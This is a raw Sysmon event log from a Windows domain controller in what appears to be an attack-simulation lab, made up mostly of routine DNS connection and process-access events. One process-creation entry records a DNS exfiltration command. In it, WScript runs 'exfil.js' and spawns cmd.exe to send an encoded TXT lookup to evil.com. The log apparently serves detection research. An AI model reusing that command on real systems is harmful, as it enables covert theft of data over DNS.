354300x8000000000000000211620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-50924-false127.0.0.1-53domain 354300x8000000000000000211619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50923- 354300x8000000000000000211618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-50923-false127.0.0.1-53domain 354300x8000000000000000211617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.722{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-50922-false127.0.0.1-53domain 354300x8000000000000000211616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.722{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50922- 354300x8000000000000000211615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.722{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-50922-false127.0.0.1-53domain 354300x8000000000000000211614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.591{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50921- 354300x8000000000000000211613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.591{00000000-0000-0000-0000-000000000000}4148<unknown process>-udptruefalse127.0.0.1-50921-false127.0.0.1-53domain 354300x8000000000000000211612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.590{00000000-0000-0000-0000-000000000000}4148<unknown process>-udpfalsefalse127.0.0.1-50920-false127.0.0.1-53domain 354300x8000000000000000211611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.590{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50920- 354300x8000000000000000211610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.590{00000000-0000-0000-0000-000000000000}4148<unknown process>-udptruefalse127.0.0.1-50920-false127.0.0.1-53domain 354300x8000000000000000211609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.590{00000000-0000-0000-0000-000000000000}4148<unknown process>-udpfalsefalse127.0.0.1-50919-false127.0.0.1-53domain 354300x8000000000000000211608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.590{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50919- 354300x8000000000000000211607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.589{00000000-0000-0000-0000-000000000000}4148<unknown process>-udptruefalse127.0.0.1-50919-false127.0.0.1-53domain 354300x8000000000000000211606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50918- 354300x8000000000000000211605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50917- 354300x8000000000000000211604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.434{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50916- 354300x8000000000000000211603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.434{00000000-0000-0000-0000-000000000000}4992<unknown process>-udptruefalse127.0.0.1-50916-false127.0.0.1-53domain 354300x8000000000000000211602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-50915-false127.0.0.1-53domain 354300x8000000000000000211601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50915- 354300x8000000000000000211600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-50915-false127.0.0.1-53domain 354300x8000000000000000211599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50914- 354300x8000000000000000211598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.319{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-50914-false127.0.0.1-53domain 354300x8000000000000000211597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.318{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50913- 354300x8000000000000000211596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.318{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-50913-false127.0.0.1-53domain 354300x8000000000000000211595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.257{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50912-false127.0.0.1-53domain 354300x8000000000000000211594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.257{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50912- 354300x8000000000000000211593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.257{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50912-false127.0.0.1-53domain 354300x8000000000000000211592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.257{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50911-false127.0.0.1-53domain 354300x8000000000000000211591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50911- 354300x8000000000000000211590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.256{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50911-false127.0.0.1-53domain 354300x8000000000000000211589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.256{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50910-false127.0.0.1-53domain 354300x8000000000000000211588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50910- 354300x8000000000000000211587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.184{00000000-0000-0000-0000-000000000000}7840<unknown process>-udpfalsefalse127.0.0.1-50909-false127.0.0.1-53domain 354300x8000000000000000211586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.184{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50909- 354300x8000000000000000211585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.184{00000000-0000-0000-0000-000000000000}7840<unknown process>-udptruefalse127.0.0.1-50909-false127.0.0.1-53domain 354300x8000000000000000211584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.184{00000000-0000-0000-0000-000000000000}7840<unknown process>-udpfalsefalse127.0.0.1-50908-false127.0.0.1-53domain 354300x8000000000000000211583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.184{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50908- 354300x8000000000000000211582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.183{00000000-0000-0000-0000-000000000000}7840<unknown process>-udptruefalse127.0.0.1-50908-false127.0.0.1-53domain 354300x8000000000000000211581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.183{00000000-0000-0000-0000-000000000000}7840<unknown process>-udpfalsefalse127.0.0.1-50907-false127.0.0.1-53domain 354300x8000000000000000211580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.183{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50907- 354300x8000000000000000211579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.183{00000000-0000-0000-0000-000000000000}7840<unknown process>-udptruefalse127.0.0.1-50907-false127.0.0.1-53domain 354300x8000000000000000211578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50906- 354300x8000000000000000211577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50905- 354300x8000000000000000211576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50904- 354300x8000000000000000211575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.027{00000000-0000-0000-0000-000000000000}2380<unknown process>-udpfalsefalse127.0.0.1-50903-false127.0.0.1-53domain 354300x8000000000000000211574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.027{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50903- 354300x8000000000000000211573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.027{00000000-0000-0000-0000-000000000000}2380<unknown process>-udptruefalse127.0.0.1-50903-false127.0.0.1-53domain 354300x8000000000000000211572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.027{00000000-0000-0000-0000-000000000000}2380<unknown process>-udpfalsefalse127.0.0.1-50902-false127.0.0.1-53domain 354300x8000000000000000211571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.025{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50902- 354300x8000000000000000211570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.025{00000000-0000-0000-0000-000000000000}2380<unknown process>-udptruefalse127.0.0.1-50902-false127.0.0.1-53domain 354300x8000000000000000211569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.024{00000000-0000-0000-0000-000000000000}2380<unknown process>-udpfalsefalse127.0.0.1-50901-false127.0.0.1-53domain 354300x8000000000000000211568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.024{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50901- 354300x8000000000000000211567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.024{00000000-0000-0000-0000-000000000000}2380<unknown process>-udptruefalse127.0.0.1-50901-false127.0.0.1-53domain 354300x8000000000000000211566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.933{00000000-0000-0000-0000-000000000000}6504<unknown process>-udpfalsefalse127.0.0.1-50900-false127.0.0.1-53domain 10341000x8000000000000000211565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.315{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B444-000000005F02}4832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.315{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B444-000000005F02}4832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.315{2E1864BB-18F3-629A-B444-000000005F02}48325420C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B344-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.300{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B444-000000005F02}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B344-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-18E0-629A-6742-000000005F02}39768140C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-B344-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.298{2E1864BB-18F3-629A-B344-000000005F02}7708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqad.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.284{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxfmn.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.262{2E1864BB-18F3-629A-B144-000000005F02}59364484C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B244-000000005F02}6232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B244-000000005F02}6232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 